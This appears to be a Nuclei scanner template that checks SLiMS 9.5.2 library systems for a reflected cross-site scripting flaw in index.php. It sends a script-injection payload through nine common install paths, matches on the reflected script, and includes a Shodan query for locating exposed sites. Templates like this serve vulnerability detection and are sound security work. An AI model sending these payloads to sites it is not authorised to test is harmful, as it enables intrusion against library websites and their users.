id: slims-9-xss-index

info:
  name: Senayan Library Management System v9.5.2 (Bulian) - Cross-Site Scripting
  author: nblirwn
  severity: medium
  description: |
    SLiMS 9.5.2 (Bulian) vulnerable to Cross-Site Scripting in index.php. When injected, website will execute the payload repeatedly
  reference:
    - https://github.com/slims/slims9_bulian/issues/185
  metadata:
    verified: true
    max-request: 8
    vendor: slims
    product: senayan_library_management_system
    shodan-query: html:'content="SLIMS'
  tags: senayan,xss,slims

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php/%22--%3E<script>alert(document.domain)</script>/index.php"
      - "{{BaseURL}}/perpustakaan/index.php/%22--%3E<script>alert(document.domain)</script>/index.php"
      - "{{BaseURL}}/slims/index.php/%22--%3E<script>alert(document.domain)</script>/index.php"
      - "{{BaseURL}}/perpustakaan/slims/index.php/%22--%3E<script>alert(document.domain)</script>/index.php"
      - "{{BaseURL}}/e-library/index.php/%22--%3E<script>alert(document.domain)</script>/index.php"
      - "{{BaseURL}}/perpus/index.php/%22--%3E<script>alert(document.domain)</script>/index.php"
      - "{{BaseURL}}/digilib/index.php/%22--%3E<script>alert(document.domain)</script>/index.php"
      - "{{BaseURL}}/bulian/index.php/%22--%3E<script>alert(document.domain)</script>/index.php"
      - "{{BaseURL}}/library/index.php/%22--%3E<script>alert(document.domain)</script>/index.php"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        words:
          - '<script>alert(document.domain)</script>'
          - 'SLiMS'
          - 'name="author'
        condition: and

      - type: word
        part: content_type
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022016f3ce8ee9f9cc6cb5d118e22bef0b7c4593f62444f0b37bdeb23cd20edd4ea8022100f73c3f65c95d66d6c772e544e2f4db515d06c603c5450a8cd56144e630d2ef7e:922c64590222798bb761d5b6d8e72950